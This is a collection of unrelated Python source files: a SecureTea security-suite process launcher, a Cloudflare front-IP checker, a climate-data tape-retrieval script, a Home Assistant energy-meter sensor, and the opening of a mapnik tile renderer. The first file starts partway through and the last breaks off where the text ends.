self.server_log = False
self.system_log = False
# Initialize empty process pool list
self.process_pool = []
def create_objects(self):
"""
Create module (Firewall, IDS, AntiVirus,
Auto Server Patcher, Web Deface) objects if
        configuration parameters are available for those.
Args:
None
Raises:
None
Returns:
None
"""
if self.cred.get("firewall"):
try:
self.logger.log(
"Initializing Firewall object",
logtype="info"
)
# Initialize Firewall object
self.firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.debug)
self.firewall = True
self.logger.log(
"Initialized Firewall object",
logtype="info"
)
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("waf"):
try:
self.logger.log(
"Initializing WAF object",
logtype="info"
)
# Initialize WAF object
                self.waf_obj = SecureTeaWaf.SecureTeaWaf(cred=self.cred["waf"], debug=self.debug)
                self.waf = True
self.logger.log(
"Initialized WAF object",
logtype="info"
)
            except KeyError:
self.logger.log(
"Web Application Firewall (WAF) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("ids"):
try:
self.logger.log(
"Initializing IDS object",
logtype="info"
)
# Initialize IDS object
self.ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.debug)
self.ids = True
self.logger.log(
"Initialized IDS object",
logtype="info"
)
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("auto_server_patcher"):
try:
self.logger.log(
"Initializing patcher object"
)
# Initialize Patcher object
self.patcher_obj = SecureTeaAutoServerPatcher(debug=self.debug,
cred=self.cred["auto_server_patcher"])
self.auto_server_patcher = True
self.logger.log(
"Initialized patcher object"
)
except KeyError:
self.logger.log(
"Auto server patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("antivirus"):
try:
# Initialize AntiVirus object
self.logger.log(
"Initializing AntiVirus object",
logtype="info"
)
# Initialize AntiVirus object
self.antivirus_obj = SecureTeaAntiVirus(debug=self.debug,
cred=self.cred["antivirus"])
self.antivirus = True
self.logger.log(
"Initialized AntiVirus object",
logtype="info"
)
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
        # Only the debug configuration is required for the System Log Monitor, hence create it unconditionally
try:
self.logger.log(
"Initializing System Log Monitor object",
logtype="info"
)
# Initialize SystemLogEngine object
self.system_log_obj = engine.SystemLogEngine(debug=self.debug)
self.system_log = True
self.logger.log(
"Initialized System Log Monitor object",
logtype="info"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("web_deface"):
try:
self.logger.log(
"Initializing Web Deface object",
logtype="info"
)
# Initialize WebDeface object
self.web_deface_obj = WebDeface(debug=self.debug,
path=self.cred['web_deface']['path'],
server_name=self.cred['web_deface']['server-name'])
self.web_deface = True
self.logger.log(
"Initialized Web Deface object",
logtype="info"
)
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("server_log"):
try:
self.logger.log(
"Initializing Server Log Monitor object",
logtype="info"
)
server_cred = self.cred['server_log']
# Initialize Server Log Monitor object
self.server_log_obj = SecureTeaServerLog(debug=self.debug,
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
self.server_log = True
self.logger.log(
"Initialized Server Log Monitor object",
logtype="info"
)
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def create_process(self):
"""
Create process for the initialized objects.
Args:
None
Raises:
None
Returns:
None
"""
if self.firewall: # if Firewall object is initialized
firewall_process = multiprocessing.Process(target=self.firewallObj.start_firewall)
self.process_pool.append(firewall_process)
if self.waf:
            waf_process = multiprocessing.Process(target=self.waf_obj.startWaf)
self.process_pool.append(waf_process)
if self.ids: # if IDS object is initialized
ids_process = multiprocessing.Process(target=self.ids_obj.start_ids)
self.process_pool.append(ids_process)
if self.auto_server_patcher: # if Auto Server Patcher is initialized
auto_server_patcher_process = multiprocessing.Process(target=self.patcher_obj.start)
self.process_pool.append(auto_server_patcher_process)
if self.antivirus: # if AntiVirus object is initialized
antivirus_process = multiprocessing.Process(target=self.antivirus_obj.start)
self.process_pool.append(antivirus_process)
if self.web_deface: # if Web Deface object is initialized
web_deface_process = multiprocessing.Process(target=self.web_deface_obj.start)
self.process_pool.append(web_deface_process)
if self.system_log: # if System Log Monitor object is initialized
system_log_process = multiprocessing.Process(target=self.system_log_obj.run)
self.process_pool.append(system_log_process)
if self.server_log: # if Server Log Monitor object is initialized
server_log_process = multiprocessing.Process(target=self.server_log_obj.run)
self.process_pool.append(server_log_process)
def start_process(self):
"""
Start all the process in the process pool
and terminate gracefully in Keyboard Interrupt.
Args:
None
Raises:
None
Returns:
None
"""
try:
for process in self.process_pool:
process.start()
for process in self.process_pool:
process.join()
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def start_server_mode(self):
"""
Start SecureTea in server mode.
Args:
None
Raises:
None
Returns:
None
"""
# Create / initialize required objects
self.create_objects()
# Create process for the objects
self.create_process()
# Start the process
self.start_process()
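# Minimal usage sketch (illustrative only; the credential keys match those read
# in create_objects(), but the nested values are placeholders):
#
#   cred = {"firewall": {...}, "ids": {...}, "server_log": {...}}
#   server = ServerMode(debug=True, cred=cred)
#   server.start_server_mode()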
|
check_ip.py
|
#!/usr/bin/env python2
# coding:utf-8
import sys
import os
import json
import threading
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, os.pardir))
data_path = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir, 'data'))
module_data_path = os.path.join(data_path, 'x_tunnel')
python_path = os.path.abspath( os.path.join(root_path, 'python27', '1.0'))
sys.path.append(root_path)
noarch_lib = os.path.abspath( os.path.join(python_path, 'lib', 'noarch'))
sys.path.insert(0, noarch_lib)
if sys.platform == "win32":
win32_lib = os.path.abspath( os.path.join(python_path, 'lib', 'win32'))
sys.path.append(win32_lib)
elif sys.platform.startswith("linux"):
linux_lib = os.path.abspath( os.path.join(python_path, 'lib', 'linux'))
sys.path.insert(1, linux_lib)
elif sys.platform == "darwin":
darwin_lib = os.path.abspath( os.path.join(python_path, 'lib', 'darwin'))
sys.path.append(darwin_lib)
extra_lib = "/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python"
sys.path.append(extra_lib)
import utils
import xlog
logger = xlog.getLogger("cloudflare_front")
logger.set_buffer(500)
from front_base.openssl_wrap import SSLContext
from front_base.connect_creator import ConnectCreator
from front_base.check_ip import CheckIp
from front_base.host_manager import HostManagerBase
from config import Config
def check_all_domain(check_ip):
with open(os.path.join(current_path, "front_domains.json"), "r") as fd:
content = fd.read()
cs = json.loads(content)
for host in cs:
host = "scan1." + host
res = check_ip.check_ip(ip, host=host, wait_time=wait_time)
if not res or not res.ok:
xlog.warn("host:%s fail", host)
else:
xlog.info("host:%s ok", host)
class CheckAllIp(object):
def __init__(self, check_ip, host):
self.check_ip = check_ip
self.host = host
self.lock = threading.Lock()
self.in_fd = open("good_ip.txt", "r")
self.out_fd = open(
os.path.join(module_data_path, "cloudflare_checked_ip.txt"),
"w"
)
def get_ip(self):
with self.lock:
while True:
line = self.in_fd.readline()
if not line:
raise Exception()
try:
ip = line.split()[0]
return ip
except:
continue
def write_ip(self, ip, host, handshake):
with self.lock:
self.out_fd.write("%s %s gws %d 0 0\n" % (ip, host, handshake))
self.out_fd.flush()
def checker(self):
while True:
try:
ip = self.get_ip()
except Exception as e:
xlog.info("no ip left")
return
try:
                res = self.check_ip.check_ip(ip, sni=self.host, host=self.host)
except Exception as e:
xlog.warn("check fail:%s except:%r", e)
continue
if not res or not res.ok:
xlog.debug("check fail:%s fail", ip)
continue
self.write_ip(ip, res.domain, res.handshake_time)
def run(self):
for i in range(0, 10):
threading.Thread(target=self.checker).start()
def check_all_ip(check_ip):
check = CheckAllIp(check_ip, "scan1.movistar.gq")
check.run()
if __name__ == "__main__":
# case 1: only ip
# case 2: ip + domain
# connect use domain
ip = "141.101.120.131"
host = "xx-net.net"
sni = host
args = list(sys.argv[1:])
if len(args):
if utils.check_ip_valid(args[0]):
ip = args.pop(0)
if len(args):
host = args.pop(0)
sni = host
if len(args):
sni = args.pop(0)
# print("Usage: check_ip.py [ip] [top_domain] [wait_time=0]")
xlog.info("test ip:%s", ip)
xlog.info("host:%s", host)
xlog.info("sni:%s", sni)
wait_time = 0
config_path = os.path.join(module_data_path, "cloudflare_front.json")
config = Config(config_path)
openssl_context = SSLContext(logger)
host_manager = HostManagerBase()
connect_creator = ConnectCreator(logger, config, openssl_context, host_manager, debug=True)
check_ip = CheckIp(logger, config, connect_creator)
#check_all_domain(check_ip)
#check_all_ip(check_ip)
#exit(0)
res = check_ip.check_ip(ip, sni=sni, host=host, wait_time=wait_time)
if not res:
xlog.warn("connect fail")
elif res.ok:
xlog.info("success, domain:%s handshake:%d", res.host, res.handshake_time)
else:
xlog.warn("not support")
|
retrieve_request.py
|
#!/usr/bin/env python
"""
retrieve_request.py
This script is run by the admin to perform a retrieval request.
Currently, the MOOSE and ET clients are installed on different servers. It
is therefore assumed that all of the data in a retrieval is on a single tape
system, but this is not checked by this script. `split_retrieve_request.py`
and `auto_retrieve.py` can be used to split requests and run them on the
appropriate tape systems respectively.
"""
from __future__ import unicode_literals, division, absolute_import
import argparse
import datetime
import glob
from itertools import chain
import logging.config
from multiprocessing import Process, Manager
import os
import random
import shutil
import subprocess
import sys
import time
import traceback
import cf_units
import django
django.setup()
from django.contrib.auth.models import User
from django.utils import timezone
from pdata_app.models import Settings, RetrievalRequest, EmailQueue, DataFile
from pdata_app.utils.common import (md5, sha256, adler32, construct_drs_path,
get_temp_filename, is_same_gws, run_command,
date_filter_files, PAUSE_FILES, grouper)
from pdata_app.utils.dbapi import match_one
__version__ = '0.1.0b1'
DEFAULT_LOG_LEVEL = logging.WARNING
DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
logger = logging.getLogger(__name__)
# The top-level directory to write output data to
BASE_OUTPUT_DIR = Settings.get_solo().base_output_dir
# The number of processes that et_get.py should use.
# Between 5 and 10 are recommended
MAX_ET_GET_PROC = 2
# The maximum number of retrievals to run in parallel
MAX_TAPE_GET_PROC = 5
# The maximum number of files to get from MASS in one moo get command
# to avoid the length of the command being longer than the shell can manage
MAX_MASS_FILES = 200
class ChecksumError(Exception):
def __init__(self, message=''):
"""
An exception to indicate that a data file's checksum does not match
the value recorded in the database.
:param str message: The error message text.
"""
Exception.__init__(self)
self.message = message
def parallel_get_urls(tapes, args):
"""
Get several tape URLs in parallel so that MOOSE can group retrievals
together to minimise the number of tape loads and ET retrievals can run
on multiple tape drives simultaneously.
:param dict tapes: The keys are the tape URLs to retrieve. The values are
a list of DataFile objects to retrieve for that URL.
:param argparse.Namespace args: The parsed command line arguments
namespace.
"""
jobs = []
manager = Manager()
params = manager.Queue()
error_event = manager.Event()
for i in range(MAX_TAPE_GET_PROC):
p = Process(target=parallel_worker, args=(params, error_event))
jobs.append(p)
p.start()
tape_urls_list = [(tape_url, tapes[tape_url], args) for tape_url in tapes]
null_arguments = (None, None, None)
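    # The (None, None, None) tuples appended after the real work items are
    # sentinels: parallel_worker() returns as soon as it pulls one from the
    # queue, so one sentinel per process shuts the pool down cleanly.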
iters = chain(tape_urls_list, (null_arguments,) * MAX_TAPE_GET_PROC)
    for item in iters:
        params.put(item)
for j in jobs:
j.join()
if error_event.is_set():
logger.error('One or more retrievals failed.')
sys.exit(1)
def parallel_worker(params, error_event):
"""
The worker function that unpacks the parameters and calls the usual
serial function.
:param multiprocessing.Manager.Queue params: the queue to get function
call parameters from
:param multiprocessing.Manager.Event error_event: If set then a
catastrophic error has occurred in another process and processing
should end
"""
while True:
# close existing connections so that a fresh connection is made
django.db.connections.close_all()
if error_event.is_set():
return
tape_url, data_files, args = params.get()
if tape_url is None:
return
# don't start any new work if we want to pause the system
for pause_file in PAUSE_FILES:
if tape_url.startswith(pause_file):
if os.path.exists(PAUSE_FILES[pause_file]):
logger.warning('Stopping due to {}'.
format(PAUSE_FILES[pause_file]))
error_event.set()
return
try:
get_tape_url(tape_url, data_files, args)
except:
exc_type, exc_value, exc_tb = sys.exc_info()
tb_list = traceback.format_exception(exc_type, exc_value, exc_tb)
tb_string = '\n'.join(tb_list)
logger.error('Fetching {} failed.\n{}'.format(tape_url, tb_string))
error_event.set()
def get_tape_url(tape_url, data_files, args):
"""
Get all of the data from `tape_url`.
:param str tape_url: The URL of the tape data to fetch.
:param list data_files: DataFile objects corresponding to the data files
required.
:param argparse.Namespace args: The parsed command line arguments
namespace.
"""
if tape_url.startswith('et:'):
get_et_url(tape_url, data_files, args)
elif tape_url.startswith('moose:'):
for file_chunk in grouper(data_files, MAX_MASS_FILES):
get_moose_url(tape_url, list(file_chunk), args)
else:
msg = ('Tape url {} is not a currently supported type of tape.'.
format(tape_url))
logger.error(msg)
raise NotImplementedError(msg)
def get_moose_url(tape_url, data_files, args):
"""
Get all of the data from `tape_url`, which is already known to be a MOOSE
url. Data is not cached and is instead copied directly into the destination
directory.
:param str tape_url: The url to fetch
:param list data_files: The DataFile objects to retrieve
:param argparse.Namespace args: The parsed command line arguments
namespace.
"""
logger.debug('Starting restoring {}'.format(tape_url))
# because the PRIMAVERA data that has been stored in MASS is in a DRS
# directory structure already then all files that have an identical
# tape_url will be placed in the same output directory
drs_path = construct_drs_path(data_files[0])
if not args.alternative:
drs_dir = os.path.join(BASE_OUTPUT_DIR, drs_path)
else:
drs_dir = os.path.join(args.alternative, drs_path)
# create the path if it doesn't exist
if not os.path.exists(drs_dir):
try:
os.makedirs(drs_dir)
except OSError:
# if running in parallel, another process could have created this
# directory at the same time and so wait a random time less than
# one second. If it fails a second time then there is a genuine
# problem
time.sleep(random.random())
if not os.path.exists(drs_dir):
os.makedirs(drs_dir)
moose_urls = ['{}/{}'.format(tape_url,
df.name if not args.incoming
else df.incoming_name) for df in data_files]
cmd = 'moo get -I {} {}'.format(' '.join(moose_urls), drs_dir)
logger.debug('MOOSE command is:\n{}'.format(cmd))
try:
cmd_out = run_command(cmd)
except RuntimeError as exc:
logger.error('MOOSE command failed\n{}'.
format(exc.__str__()))
sys.exit(1)
logger.debug('Restored {}'.format(tape_url))
_remove_data_license_files(drs_dir)
for data_file in data_files:
filename = (data_file.name if not args.incoming
else data_file.incoming_name)
if not args.skip_checksums:
try:
_check_file_checksum(
data_file,
os.path.join(drs_dir, filename)
)
except ChecksumError:
# warning message has already been displayed and so move on
# to next file
continue
# create symbolic link from main directory if storing data in an
# alternative directory
if args.alternative:
primary_path = os.path.join(BASE_OUTPUT_DIR, drs_path)
if not os.path.exists(primary_path):
os.makedirs(primary_path)
primary_file = os.path.join(primary_path,filename)
if not os.path.exists(primary_file):
os.symlink(os.path.join(drs_dir,filename),
primary_file)
data_file.directory = drs_dir
data_file.online = True
try:
data_file.save()
except django.db.utils.IntegrityError:
logger.error('data_file.save() failed for {} {}'.
format(data_file.directory, filename))
raise
def get_et_url(tape_url, data_files, args):
"""
Get all of the data from `tape_url`, which is already known to be an ET url.
:param str tape_url: The url to fetch
:param list data_files: The files to retrieve
:param argparse.Namespace args: The parsed command line arguments
namespace.
"""
logger.debug('Starting restoring {}'.format(tape_url))
# make a file containing the paths of the files to retrieve from tape
filelist_name = get_temp_filename('et_files.txt')
with open(filelist_name, 'w') as fh:
for data_file in data_files:
filename = (data_file.name if not args.incoming
else data_file.incoming_name)
fh.write(os.path.join(data_file.incoming_directory, filename)
+ '\n')
logger.debug('File list written to {}'.format(filelist_name))
if args.alternative:
base_dir = args.alternative
else:
base_dir = BASE_OUTPUT_DIR
batch_id = int(tape_url.split(':')[1])
retrieval_dir = os.path.normpath(
os.path.join(base_dir, '..', '.et_retrievals',
'ret_{:04}'.format(args.retrieval_id),
'batch_{:05}'.format(batch_id)))
if not os.path.exists(retrieval_dir):
os.makedirs(retrieval_dir)
logger.debug('Restoring to {}'.format(retrieval_dir))
cmd = ('/usr/bin/python /usr/bin/et_get.py -f {} -r {} -t {}'.
format(filelist_name, retrieval_dir,
MAX_ET_GET_PROC))
logger.debug('et_get.py command is:\n{}'.format(cmd))
try:
cmd_out = run_command(cmd)
except RuntimeError as exc:
logger.error('et_get.py command failed\n{}'.format(exc.__str__()))
sys.exit(1)
copy_et_files_into_drs(data_files, retrieval_dir, args)
try:
os.remove(filelist_name)
except OSError:
logger.warning('Unable to delete temporary file: {}'.
format(filelist_name))
try:
shutil.rmtree(retrieval_dir)
except OSError:
logger.warning('Unable to delete retrieval directory: {}'.
format(retrieval_dir))
logger.debug('Restored {}'.format(tape_url))
def copy_et_files_into_drs(data_files, retrieval_dir, args):
"""
Copy files from the restored data cache into the DRS structure.
:param list data_files: The DataFile objects to copy.
:param str retrieval_dir: The path that the files were retrieved to.
:param argparse.Namespace args: The parsed command line arguments
namespace.
"""
logger.debug('Copying elastic tape files')
for data_file in data_files:
file_submission_dir = data_file.incoming_directory
filename = (data_file.name if not args.incoming
else data_file.incoming_name)
extracted_file_path = os.path.join(retrieval_dir,
file_submission_dir.lstrip('/'),
filename)
if not os.path.exists(extracted_file_path):
msg = ('Unable to find file {} in the extracted data at {}. The '
'expected path was {}'.format(filename, retrieval_dir,
extracted_file_path))
logger.error(msg)
sys.exit(1)
drs_path = construct_drs_path(data_file)
if not args.alternative:
drs_dir = os.path.join(BASE_OUTPUT_DIR, drs_path)
else:
drs_dir = os.path.join(args.alternative, drs_path)
dest_file_path = os.path.join(drs_dir, filename)
# create the path if it doesn't exist
if not os.path.exists(drs_dir):
os.makedirs(drs_dir)
if os.path.exists(dest_file_path):
msg = 'File already exists on disk: {}'.format(dest_file_path)
logger.warning(msg)
else:
os.rename(extracted_file_path, dest_file_path)
if not args.skip_checksums:
try:
_check_file_checksum(data_file, dest_file_path)
except ChecksumError:
# warning message has already been displayed and so move on
# to next file
continue
# create symbolic link from main directory if storing data in an
# alternative directory
if args.alternative and not is_same_gws(dest_file_path,
BASE_OUTPUT_DIR):
primary_path = os.path.join(BASE_OUTPUT_DIR, drs_path)
if not os.path.exists(primary_path):
os.makedirs(primary_path)
os.symlink(dest_file_path,
os.path.join(primary_path, filename))
# set directory and set status as being online
data_file.directory = drs_dir
data_file.online = True
data_file.save()
logger.debug('Finished copying elastic tape files')
def _check_file_checksum(data_file, file_path):
"""
Check that a restored file's checksum matches the value in the database.
:param pdata_app.models.DataFile data_file: the database file object
:param str file_path: the path to the restored file
:raises ChecksumError: if the checksums don't match.
"""
checksum_methods = {'ADLER32': adler32,
'MD5': md5,
'SHA256': sha256}
    # there is only likely to be one checksum and so choose the last one
if not cmd_args.incoming:
checksum_obj = data_file.checksum_set.last()
else:
checksum_obj = data_file.tapechecksum_set.last()
if not checksum_obj:
msg = ('No checksum exists in the database. Skipping check for {}'.
format(file_path))
logger.warning(msg)
return
file_checksum = checksum_methods[checksum_obj.checksum_type](file_path)
if file_checksum != checksum_obj.checksum_value:
msg = ('Checksum for restored file does not match its value in the '
'database.\n {}: {}:{}\nDatabase: {}:{}'.format(file_path,
checksum_obj.checksum_type, file_checksum,
checksum_obj.checksum_type, checksum_obj.checksum_value))
logger.warning(msg)
raise ChecksumError(msg)
def _email_user_success(retrieval):
"""
Send an email to request's creator advising them that their data's been
successfully restored.
:param pdata_app.models.RetrievalRequest retrieval: the retrieval object
"""
contact_user_id = Settings.get_solo().contact_user_id
contact_user = User.objects.get(username=contact_user_id)
msg = (
'Dear {},\n'
'\n'
'Your retrieval request number {} has now been restored from '
'tape to group workspace. The data will be available in the DRS '
'directory structure at {}.\n'
'\n'
'To free up disk space on the group workspaces we would be grateful '
'if this data could be marked as finished at '
'https://prima-dm.ceda.ac.uk/retrieval_requests/ as soon as you have '
'finished analysing it.\n'
'\n'
'Thanks,\n'
'\n'
'{}'.format(retrieval.requester.first_name, retrieval.id,
BASE_OUTPUT_DIR, contact_user.first_name)
)
_email = EmailQueue.objects.create(
recipient=retrieval.requester,
subject=('[PRIMAVERA_DMT] Retrieval Request {} Complete'.
format(retrieval.id)),
message=msg
)
def _email_admin_failure(retrieval):
"""
Send an email to the admin user advising them that the retrieval failed.
:param pdata_app.models.RetrievalRequest retrieval: the retrieval object
"""
contact_user_id = Settings.get_solo().contact_user_id
contact_user = User.objects.get(username=contact_user_id)
msg = (
'Dear {},\n'
'\n'
'Retrieval request number {} failed.\n'
'\n'
'Thanks,\n'
'\n'
'{}'.format(contact_user.first_name, retrieval.id,
contact_user.first_name)
)
_email = EmailQueue.objects.create(
recipient=contact_user,
subject=('[PRIMAVERA_DMT] Retrieval Request {} Failed'.
format(retrieval.id)),
message=msg
)
def _remove_data_license_files(dir_path):
"""
Delete any Met Office Data License files from the directory specified.
:param str dir_path: The directory to remove files from.
"""
license_file_glob = 'MetOffice_data_licence.*'
for lic_file in glob.iglob(os.path.join(dir_path, license_file_glob)):
try:
os.remove(lic_file)
except OSError:
logger.warning('Unable to delete license file {}'.format(lic_file))
def parse_args():
"""
Parse command-line arguments
"""
parser = argparse.ArgumentParser(description='Perform a PRIMAVERA '
'retrieval request.')
parser.add_argument('retrieval_id', help='the id of the retrieval request '
'to carry out.', type=int)
parser.add_argument('-a', '--alternative', help="store data in alternative "
"directory and create a symbolic link to each file from the main "
"retrieval directory")
parser.add_argument('-s', '--skip_checksums', help="don't check the "
"checksums on restored files.", action='store_true')
parser.add_argument('-i', '--incoming', help="restore the incoming "
"filename.", action='store_true')
parser.add_argument('-l', '--log-level', help='set logging level to one of '
'debug, info, warn (the default), or error')
parser.add_argument('--version', action='version',
version='%(prog)s {}'.format(__version__))
args = parser.parse_args()
return args
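# Example invocation (hypothetical values; flags as defined in parse_args() above):
#   python retrieve_request.py 42 --alternative /path/to/other/gws --log-level debug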
def main(args):
"""
Main entry point
"""
logger.debug('Starting retrieve_request.py for retrieval {}'.
format(args.retrieval_id))
# check retrieval
retrieval = match_one(RetrievalRequest, id=args.retrieval_id)
if not retrieval:
logger.error('Unable to find retrieval id {}'.format(
args.retrieval_id))
sys.exit(1)
if retrieval.date_complete:
logger.error('Retrieval {} was already completed, at {}.'.
format(retrieval.id,
retrieval.date_complete.strftime('%Y-%m-%d %H:%M')))
sys.exit(1)
tapes = {}
for data_req in retrieval.data_request.all():
all_files = data_req.datafile_set.filter(online=False)
filtered_files = date_filter_files(all_files, retrieval.start_year,
retrieval.end_year)
if filtered_files is None:
continue
tape_urls = list(set([qs['tape_url']
for qs in filtered_files.values('tape_url')]))
tape_urls.sort()
for tape_url in tape_urls:
url_files = filtered_files.filter(tape_url=tape_url)
if tape_url in tapes:
tapes[tape_url] = list(chain(tapes[tape_url], url_files))
else:
tapes[tape_url] = list(url_files)
# lets get parallel to speed things up
parallel_get_urls(tapes, args)
# get a fresh DB connection after exiting from parallel operation
django.db.connections.close_all()
# check that all files were restored
failed_files = False
for data_req in retrieval.data_request.all():
all_files = data_req.datafile_set.filter(online=False)
missing_files = date_filter_files(all_files, retrieval.start_year,
retrieval.end_year)
if missing_files is None:
continue
if missing_files.count() != 0:
failed_files = True
if failed_files:
_email_admin_failure(retrieval)
logger.error('Failed retrieve_request.py for retrieval {}'.
format(args.retrieval_id))
else:
# set date_complete in the db
retrieval.date_complete = timezone.now()
retrieval.save()
# send an email to advise the user that their data's been restored
_email_user_success(retrieval)
logger.debug('Completed retrieve_request.py for retrieval {}'.
format(args.retrieval_id))
if __name__ == "__main__":
cmd_args = parse_args()
# determine the log level
if cmd_args.log_level:
try:
log_level = getattr(logging, cmd_args.log_level.upper())
except AttributeError:
logger.setLevel(logging.WARNING)
logger.error('log-level must be one of: debug, info, warn or error')
sys.exit(1)
else:
log_level = DEFAULT_LOG_LEVEL
# configure the logger
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': DEFAULT_LOG_FORMAT,
},
},
'handlers': {
'default': {
'level': log_level,
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': log_level,
'propagate': True
}
}
})
# run the code
main(cmd_args)
|
sensor.py
|
"""
Use serial protocol of EMU2 meter to obtain state of the connected meter.
For more details about this component, please refer to the documentation
at https://github.com/jrhorrisberger/home-assistant/blob/master/custom_components/rainforest/readme.md
"""
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_NAME, EVENT_HOMEASSISTANT_STOP)
import logging
import voluptuous as vol
from threading import Thread
__version__ = '0.2.1'
_LOGGER = logging.getLogger(__name__)
DOMAIN = "rainforest"
DEFAULT_NAME = "Rainforest Energy Monitoring Unit"
CONF_PORT = 'port'
ATTR_DEVICE_MAC_ID = "Device MAC ID"
ATTR_METER_MAC_ID = "Meter MAC ID"
ATTR_TEIR = "Price Teir"
ATTR_PRICE = "Price"
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_PORT): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
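# Illustrative configuration.yaml snippet matching PLATFORM_SCHEMA above
# (the serial port value is a placeholder):
#
#   sensor:
#     - platform: rainforest
#       port: /dev/ttyUSB0
#       name: Rainforest EMU-2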
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
_LOGGER.debug("Loading")
port = config.get(CONF_PORT)
sensor_name = config.get(CONF_NAME)
sensor = EMU2Sensor(sensor_name, port)
hass.bus.async_listen_once(
        EVENT_HOMEASSISTANT_STOP, sensor.stop_serial_read)
async_add_entities([sensor])
class EMU2Sensor(Entity):
def __init__(self, sensor_name, port):
_LOGGER.debug("Init")
self._port = port
self._name = sensor_name
self._baudrate = 115200
self._timeout = 1
self._icon = 'mdi:flash'
self._unit_of_measurement = "kWh"
self._serial_thread = None
self._serial_thread_isEnabled = True
self._state = None
self._data = {}
self._data[ATTR_DEVICE_MAC_ID] = None
self._data[ATTR_METER_MAC_ID] = None
self._data[ATTR_TEIR] = None
self._data[ATTR_PRICE] = None
@property
def name(self):
return self._name
@property
def device_state_attributes(self):
return {
ATTR_DEVICE_MAC_ID: self._data.get(ATTR_DEVICE_MAC_ID),
ATTR_METER_MAC_ID: self._data.get(ATTR_METER_MAC_ID),
ATTR_TEIR: self._data.get(ATTR_TEIR),
ATTR_PRICE: self._data.get(ATTR_PRICE),
}
@property
def icon(self):
return self._icon
@property
def state(self):
return self._state
@property
def should_poll(self):
return False
@property
def unit_of_measurement(self):
return self._unit_of_measurement
async def async_added_to_hass(self):
_LOGGER.debug("Thread Start")
self._serial_thread = Thread(target = self.serial_read, args = (self._port, self._baudrate, self._timeout))
self._serial_thread.start()
def serial_read(self, portIN, baudrateIN, timeoutIN, **kwargs):
_LOGGER.debug("Thread Starting")
import serial, time
import xml.etree.ElementTree as xmlDecoder
reader = None
        while reader is None:
try:
reader = serial.Serial(portIN, baudrateIN, timeout=timeoutIN)
except:
_LOGGER.error("Failed to open %s. Retrying in 5s...", portIN)
time.sleep(5.0)
_LOGGER.debug("Begining Loop")
while self._serial_thread_isEnabled:
if (reader.in_waiting > 0):
#_LOGGER.debug("Data RX")
msgStr = reader.read(reader.in_waiting).decode()
                if msgStr and msgStr[0] == '<':
try:
xmlTree = xmlDecoder.fromstring(msgStr)
except:
continue
if xmlTree.tag == 'InstantaneousDemand':
demand = int(xmlTree.find('Demand').text, 16)
multiplier = int(xmlTree.find('Multiplier').text, 16)
divisor = int(xmlTree.find('Divisor').text, 16)
digitsRight = int(xmlTree.find('DigitsRight').text, 16)
if(divisor != 0):
self._state = round(((demand * multiplier) / divisor), digitsRight)
self._data[ATTR_DEVICE_MAC_ID] = xmlTree.find('DeviceMacId').text
self._data[ATTR_METER_MAC_ID] = xmlTree.find('MeterMacId').text
self.async_schedule_update_ha_state()
_LOGGER.debug("InstantaneousDemand: %s", self._state)
elif xmlTree.tag == 'PriceCluster':
priceRaw = int(xmlTree.find('Price').text, 16)
trailingDigits = int(xmlTree.find('TrailingDigits').text, 16)
self._data[ATTR_PRICE] = priceRaw / pow(10, trailingDigits)
self._data[ATTR_TEIR] = int(xmlTree.find('Tier').text, 16)
_LOGGER.debug("PriceCluster: %s", self._data[ATTR_PRICE])
else:
time.sleep(0.5)
reader.close()
async def stop_serial_read(self):
self._serial_thread_isEnabled = False
|
generate_tiles.py
|
#!/usr/bin/env python
from math import pi,cos,sin,log,exp,atan
from subprocess import call
import sys, os
from Queue import Queue
from pandas import DataFrame
import xml.etree.ElementTree as ET
import multiprocessing
import threading
import glob
import json
import os.path
#try:
# import mapnik2 as mapnik
#except:
# import mapnik
import mapnik
DEG_TO_RAD = pi/180
RAD_TO_DEG = 180/pi
# Default number of rendering threads to spawn, should be roughly equal to number of CPU cores available
#NUM_THREADS = 4
NUM_THREADS = multiprocessing.cpu_count()
def minmax (a,b,c):
a = max(a,b)
a = min(a,c)
return a
class GoogleProjection:
def __init__(self,levels=18):
self.Bc = []
self.Cc = []
self.zc = []
self.Ac = []
c = 256
for d in range(0,levels):
e = c/2;
self.Bc.append(c/360.0)
self.Cc.append(c/(2 * pi))
self.zc.append((e,e))
self.Ac.append(c)
